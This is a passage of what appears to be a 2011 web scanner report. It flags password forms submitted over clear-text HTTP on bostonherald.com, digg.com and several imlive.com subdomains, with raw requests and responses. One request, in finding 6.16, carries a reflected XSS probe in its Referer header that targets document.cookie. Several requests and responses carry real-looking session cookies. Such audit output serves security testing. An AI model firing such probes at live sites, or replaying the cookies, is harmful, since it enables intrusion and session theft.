X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 67934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.4. http://bostonherald.com/users/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/users/login?returnto=/users/

The form contains the following password field:

password

Request

GET /users/login HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<hr class="userSep" />

<form name="register" action="/users/login?returnto=/users/" method="POST">

<div style="width:350px; margin:40px auto; ">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" style="width:340px;"/></div>
...[SNIP]...

6.5. http://bostonherald.com/users/register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6.6. http://br.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=646c9815-aa9c-4aef-98a9-a90044ab80e5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:50 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:50 GMT
Connection: close
Content-Length: 18208
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.7. http://cafr.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://cafr.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=y3tfry450byj5jywotc4d055; path=/; HttpOnly
Set-Cookie: spvdr=vd=afa07c32-e9d6-40f5-9fbf-41c391d891a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 18731
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.8. http://de.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://de.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: spvdr=vd=02b46df6-422e-4d35-8928-ba18aa43474c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:56 GMT
Connection: close
Content-Length: 18297
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.9. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form (class "hidden") with no action attribute, so the browser submits it to the page's own URL over clear-text HTTP: http://digg.com/submit. The form contains the following password field: password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.10. http://dk.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://dk.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
Set-Cookie: spvdr=vd=6b4ad7c2-4fe9-446c-bd92-1540c020264b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:06 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 17878
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.11. http://es.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://es.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: spvdr=vd=8e4ca1d5-377c-48cd-a6db-d82638510b03&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18321
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.12. http://fr.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://fr.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: spvdr=vd=49cda1d5-e336-4ec8-bd41-d08c0704718a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:18 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 18534
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.13. http://gr.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://gr.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: spvdr=vd=acc31a9c-64aa-4483-a09d-06f887e53a48&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:21 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 20472
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.14. http://imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 18944
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.15. http://imlive.com/homepagems3.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The page contains a form (frmLogin) with the following action URL, which is submitted over clear-text HTTP: http://imlive.com/homepagems3.asp? (method POST). The form contains the following password field: header_password

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 13:59:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10201


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<td align=right>
   <form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?" style="margin:0;" name="frmLogin" ID="frmLogin"><input type="hidden" name="func" id="func" value="log">
...[SNIP]...
<div style="display:inline;" id="PwdParent"><input type="password" name="header_password" id="header_password" class="inputhead"></div>
...[SNIP]...

6.16. http://imlive.com/webcam-login/

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The page contains a form (frm, method POST) with no action attribute, so the browser submits it to the page's own URL over clear-text HTTP: http://imlive.com/webcam-login/. The form contains the following password field: txtPassword

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:06:25 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div class="LoginPart minH">
<form onsubmit="return IsValidLogin(this)" method="post" name="frm">
<span id="ctl00_BodyContentPlaceHolder_lWelcome" class="loginWelcome">
...[SNIP]...
</label>
<input type="password" id="txtPassword" name="txtPassword" tabindex="2" />
<input type="submit" value="Submit" tabindex="4" />
...[SNIP]...

6.17. http://in.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://in.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
